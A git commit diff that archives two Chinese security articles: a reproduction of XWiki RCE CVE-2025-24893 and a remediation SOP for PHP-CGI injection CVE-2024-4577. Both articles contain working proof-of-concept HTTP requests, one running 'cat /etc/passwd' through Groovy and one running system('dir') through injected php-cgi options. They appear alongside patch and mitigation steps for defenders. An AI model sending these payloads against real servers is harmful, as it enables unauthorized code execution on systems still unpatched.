【漏洞处置SOP】PHP CGI代码注入漏洞(CVE-2024-4577)、【成功复现】XWiki Platform系统远程代码执行漏洞(CVE-2025-24893)、

This commit is contained in:
test 2025-04-30 20:20:15 +00:00
parent 5b65f88e77
commit 68846fb1a8
3 changed files with 249 additions and 1 deletions

View File

@ -13502,5 +13502,7 @@
"https://mp.weixin.qq.com/s?__biz=MzI3NzMzNzE5Ng==&mid=2247490045&idx=1&sn=6a8ac602f3c2d561b1738f0292d82d55": "【漏洞预警】Yeswiki远程代码执行漏洞CVE-2025-46347",
"https://mp.weixin.qq.com/s?__biz=Mzk0MjE3ODkxNg==&mid=2247489271&idx=1&sn=8d47ee4c8bb63b8265049ea0dcd8ce78": "【漏洞通告】微软Telnet Server(MS-TNAP)身份验证绕过漏洞",
"https://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247522902&idx=2&sn=7fcf319ff464d0f4275a2de94fe854f8&subscene=0": "Planet Technology 工业网络产品中存在多个严重漏洞",
"https://mp.weixin.qq.com/s?__biz=Mzk0OTQzMDI4Mg==&mid=2247484816&idx=3&sn=b5673d90eadf3ee6f4dc1bf3c39ab44d": "入选作品公布安钥®「漏洞处置标准作业程序SOP」征文第三十三期"
"https://mp.weixin.qq.com/s?__biz=Mzk0OTQzMDI4Mg==&mid=2247484816&idx=3&sn=b5673d90eadf3ee6f4dc1bf3c39ab44d": "入选作品公布安钥®「漏洞处置标准作业程序SOP」征文第三十三期",
"https://mp.weixin.qq.com/s?__biz=Mzk0OTQzMDI4Mg==&mid=2247484816&idx=2&sn=24c18051273a89a9237d6fa7343b76c0": "【漏洞处置SOP】PHP CGI代码注入漏洞CVE-2024-4577",
"https://mp.weixin.qq.com/s?__biz=MzU2NDgzOTQzNw==&mid=2247503201&idx=1&sn=51cbcde9c3c7543236c2e0da86236628": "【成功复现】XWiki Platform系统远程代码执行漏洞CVE-2025-24893)"
}

View File

@ -0,0 +1,33 @@
# 【成功复现】XWiki Platform系统远程代码执行漏洞CVE-2025-24893)
原创 弥天安全实验室 弥天安全实验室 2025-04-30 12:31
#
网安引领时代,弥天点亮未来  
 
 
![Image](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hDCVZx96ZMibcJI8GEwNnAyx4yiavy2qelCaTeSAibEeFrVtpyibBCicjbzwDkmBJDj9xBWJ6ff10OTQ2w/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
**0x00写在前面**
**本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!**
0x01漏洞介绍XWiki Platform是XWiki开源的一套用于创建Web协作应用程序的Wiki平台。XWiki Platform存在安全漏洞该漏洞源于任何来宾用户都可以通过对SolrSearch的请求造成远程代码执行。CVE-2025-24893是针对XWiki平台SolrSearchMacros组件的远程代码执行漏洞RCE该漏洞源于对用户输入数据的未充分过滤攻击者可利用Solr查询参数注入恶意代码通过服务端模板引擎如Velocity或Groovy触发命令执行。0x02影响版本
16.0.0-rc-1<=org.xwiki.platform:xwiki-platform-search-solr-ui<16.4.1
5.3-milestone-2<=org.xwiki.platform:xwiki-platform-search-solr-ui<15.10.11
![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hCw6lmHQQmzUUGmDibSuXZGyDibPFichB97k3qm7Zp7SUr8QZ5WgZf9kibURO4uuTfcu47Ft5F6cSyC1A/640?wx_fmt=png&from=appmsg "")
0x03漏洞复现
1.访问漏洞环境
![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hCw6lmHQQmzUUGmDibSuXZGyLbNJGrw39HwCpAy8kqm89XuA4W8LeibPVKp9R79wdfZPibicmcr93micXQ/640?wx_fmt=png&from=appmsg "")
2.对漏洞进行复现 POC 漏洞复现GET /bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36      执行payload通过响应判断漏洞存在。3.Yakit插件测试0x04修复建议目前厂商已发布升级补丁以修复漏洞补丁获取链接临时解决在xwiki.cfg 中禁用危险宏 rendering.restrictedParameters  = velocity, groovy rendering.transformations  = macro, icon, link建议尽快升级修复漏洞再次声明本文仅供学习使用非法他用责任自负https://github.com/xwiki/xwiki-platform/releases/tag/xwiki-platform-16.10.4弥天简介学海浩茫予以风动必降弥天之润弥天安全实验室成立于2019年2月19日主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子也是民间组织。主要以技术共享、交流等不断赋能自己赋能安全圈为网络安全发展贡献自己的微薄之力。口号 网安引领时代,弥天点亮未来 知识分享完了喜欢别忘了关注我们哦~学海浩茫,予以风动,必降弥天之润!   弥  天安全实验室

View File

@ -0,0 +1,213 @@
# 【漏洞处置SOP】PHP CGI代码注入漏洞CVE-2024-4577
原创 just4fun 方桥安全漏洞防治中心 2025-04-30 10:02
![](https://mmbiz.qpic.cn/sz_mmbiz_png/2JVOUiaJORTvoqLpZUhcwaISvulpbibCCmwbuYO8oOo7CBO8643tmj3XjxWVPWr4gFkfFEGgClNSTy7ZoqiaSjjGQ/640?wx_fmt=png&from=appmsg "")
# 01 SOP基本信息
- **SOP名称**
PHP CGI代码注入漏洞CVE-2024-4577处置标准作业程序SOP
- **版本:**
1.0
- **发布日期:**
2025-04-08
- **作者just4fun**
- **审核人:**
T小组
- **修订记录:**
- **初始版本:**
创建SOP
# 02 SOP的用途
本SOP旨在指导系统管理员安全、高效地处置 PHP CGI代码注入漏洞CVE-2024-4577确保在规定时间内完成漏洞修复并提交给安全部门验证保障系统安全。
# 03 SOP的目标用户技能要求
- 熟悉PHP语言、PHP程序的安装配置和管理
- 了解基本的系统管理和更新操作
- 具备基本的网络安全知识
# 04 漏洞详细信息
- 漏洞名称PHP CGI 代码注入漏洞CVE-2024-4577
- CVE编号CVE-2024-4577
- 漏洞类型远程代码执行RCE
- 风险等级:高危
- CVSS评分9.8
- 漏洞描述在PHP 8.1.29之前的8.1.*版本、8.2.20之前的8.2.*版本和8.3.8之前的8.3.*版本中当在Windows上使用Apache和PHP-CGI时如果系统设置为使用某些代码页则Windows可以使用“Best-Fit”行为来替换为Win32 API函数提供的命令行中的字符。PHP CGI模块可能会将这些字符误解为PHP选项这可能会允许恶意用户将选项传递给正在运行的PHP二进制文件从而泄露脚本的源代码在服务器上运行任意PHP代码等。
- 影响范围:
- 8.1.0 <=  PHP  < 8.1.29
- 8.2.0 <=  PHP < 8.2.20
- 8.3.0 <=  PHP < 8.3.8
- PHP 8.0、7.x、5.x等已停止维护的分支同样受影响。
- XAMPP Windows版影响版本 <= 8.2.12
- XAMPP windows版影响版本 <= 8.1.25
- XAMPP Windows版影响版本 <= 8.0.30
    漏洞利用需要同时满足以下条件:
- PHP运行在Window平台。
- 以CGI模式运行的PHP环境。
- 使用以下其中之一的语言系统:繁体中文、简体中文、日文。
**05**
**漏洞处置方案**
**升级到安全版本:**
- PHP >=  8.1.29
- PHP >=  8.2.20
- PHP >=  8.3.8
**临时缓解方案:**
- 对于使用 XAMPP for Windows 的用户截至本文撰写时2025/04/08XAMPP 尚未针对此漏洞发布相应的更新文件。如果确认不需要 PHP CGI 功能,可以通过修改以下 Apache HTTP Server 配置来避免受到该漏洞的影响。
```
C:/xampp/apache/conf/extra/httpd-xampp.conf  # apache的安装目录配置文件找到相应的行ScriptAlias /php-cgi/ "C:/xampp/php/"最前面加上”#”将其注释掉:# ScriptAlias /php-cgi/ "C:/xampp/php/"
C:/xampp/apache/conf/extra/httpd-xampp.conf  # apache的安装目录配置文件
找到相应的行:
ScriptAlias /php-cgi/ "C:/xampp/php/"
最前面加上”#”将其注释掉:
# ScriptAlias /php-cgi/ "C:/xampp/php/"
```
# 【注意事项】
- 在应用补丁或升级版本之前,请确保进行充分的备份。
- 遵循官方提供的安装和配置指南进行操作。
- 在生产环境中升级前,最好在测试环境中先进行测试。
- 修复漏洞前进行充分测试,以确保系统稳定性和安全性。
- 不同版本系列尽量升级到本系列版本无漏洞的版本,尽量不要版本跨度太大,避免出现一些不兼容情况。
# 06 漏洞修补详细步骤
## 1. 识别漏洞:确认当前版本和配置存在漏洞(使用POC辅助验证
以Windows Server 2016为例IP地址为192.168.174.128XAMPP版本为8.1.25安装路径为 C:\xampp
首先检查是否安装了漏洞版本。打开XAMPP控制台日志可以显示版本号为8.1.25为漏洞版本。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/2JVOUiaJORTvoqLpZUhcwaISvulpbibCCmeBqRvhibMGkrm2sKzde0yz0iawmFwiakePIUgSkzaQtQcDK9KQcyQWLXQ/640?wx_fmt=png&from=appmsg "")
点击Shell 输入php -v 
可以显示当前php的版本号8.1.25,为漏洞版本。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/2JVOUiaJORTvoqLpZUhcwaISvulpbibCCm0IsdO99n86b1LjP8MPpkv1cPTyFXTlz77aX20eZx7PFHmP9gsGp7Fg/640?wx_fmt=png&from=appmsg "")
使用默认配置点击Apache后面的Start按钮启动Apache服务默认服务地址为http://192.168.174.128/。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/2JVOUiaJORTvoqLpZUhcwaISvulpbibCCmARZQTwT68UjzE3pmhAQ1PuVWO86bNiaqtCfpEsialJ3VmJeVgTNoeu3g/640?wx_fmt=png&from=appmsg "")
另一个页面http://192.168.174.128/dashboard/phpinfo.php可以看到当前php的信息。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/2JVOUiaJORTvoqLpZUhcwaISvulpbibCCmHNiaFtZsVw9K68uXhjk2eyVxbSictFQo7icrS3WRtWwyjKzIjBxBo9b0g/640?wx_fmt=png&from=appmsg "")
接下来使用如下POC进行辅助漏洞验证使用BurpSuite发送数据包根据回显发现执行了dir 命令显示了目录下的文件,验证漏洞存在。
```
GET /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1Host: 192.168.174.128Connection: closeCache-Control: max-age=0sec-ch-ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Content-Length: 22<?php system("dir");?>
GET /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: 192.168.174.128
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 22
<?php system("dir");?>
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/2JVOUiaJORTvoqLpZUhcwaISvulpbibCCmYicBIffwzgWzH0mYo0FxrlJicRD2TCoTWqadLibLOcSreRnSzHS1icHwJw/640?wx_fmt=png&from=appmsg "")
## 2. 实施修复目标是安装PHP的 安全版本8.1.29。
确认Windows版本确认Windows系统是32位还是64位可以在“我的电脑”或“此电脑”的属性中查看。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/2JVOUiaJORTvoqLpZUhcwaISvulpbibCCmScYiaZy0ibJLYnrYcyhSrrD73tUT4ib2zhic0Db5vqSpRjJt4fB5WrM2HQ/640?wx_fmt=png&from=appmsg "")
打开浏览器访问PHP官网的Windows版本下载链接https://windows.php.net/downloads/releases/archives/下拉找到版本8.1.29点击zip链接进行下载。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/2JVOUiaJORTvoqLpZUhcwaISvulpbibCCmNSJM48Smc9z3Tu8dO1Zx2uwe7ia06hGs9iaaicicibJK746ZlCgJpmic13rg/640?wx_fmt=png&from=appmsg "")
然后根据系统版本下载64位或32位的。因环境为64位系统下载文件为php-8.1.29-Win32-vs16-x64.zip将其放置到待修复环境中解压缩即可使用存放目录为C:\Users\server\Desktop\php-8.1.29-Win32-vs16-x64。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/2JVOUiaJORTvoqLpZUhcwaISvulpbibCCmBfS6C39RVd4HYciaibVjtANSj1UUW7ULFQySRNcicIs841XwHlA7AOGiag/640?wx_fmt=png&from=appmsg "")
接下来停止服务点击Apache后面的Stop按钮。然后修改XAMPP中的PHP版本点击Apache后面的Coinfig按钮选择httpd-xampp.conf打开此文件。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/2JVOUiaJORTvoqLpZUhcwaISvulpbibCCmicoC7ZCasicteJY16hicucm21zQBzOj6eVVTjwpvzc9v6Ij8VBntEElWQ/640?wx_fmt=png&from=appmsg "")
替换此文件中的PHP安装路径例如将原来的C:/xampp/php/全部修改为C:/Users/server/Desktop/php-8.1.29-Win32-vs16-x64/,保存配置文件。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/2JVOUiaJORTvoqLpZUhcwaISvulpbibCCmbE91ph09OUR0TtRADhPSJWKteejSiaAyoAvamsy18hs8H1tSFIbMkdQ/640?wx_fmt=png&from=appmsg "")
## 3. 验证修复PHP版本号已经升级到了8.1.29
点击Apache后面的Start按钮再次启动Apache服务。
访问http://192.168.174.128/dashboard/phpinfo.php可以看到PHP版本号已经升级到了8.1.29。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/2JVOUiaJORTvoqLpZUhcwaISvulpbibCCmxW8egIGxEjL5lADADbzNhFsrj6LQ61sSvvnXAl1zz65xATpqAKhskg/640?wx_fmt=png&from=appmsg "")
再次使用POC进行验证发现已经无法执行命令了证明漏洞已经修复。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/2JVOUiaJORTvoqLpZUhcwaISvulpbibCCmADocYL5JA47KSauL31vP8jMRUtBm6DOzoeI7U9ickMicUompEJNichjVw/640?wx_fmt=png&from=appmsg "")
## 4. 参考链接
[1] 
CVE-2024-4577 PHP CGI 远程代码执行漏洞分析
[2] 
CVE-2024-4577-NVD
##
- End -
欢迎投稿或扫码添加运营助手获取附件
![图片](https://mmbiz.qpic.cn/sz_mmbiz_png/2JVOUiaJORTs0BYdgedlDZlsLV4xZ0ibUnRljKAMsTq37lxLQCBBuo5pgf5iahvEaL4rAfHY9wR2fyE2M8e9V2k4g/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
欢迎关注公众号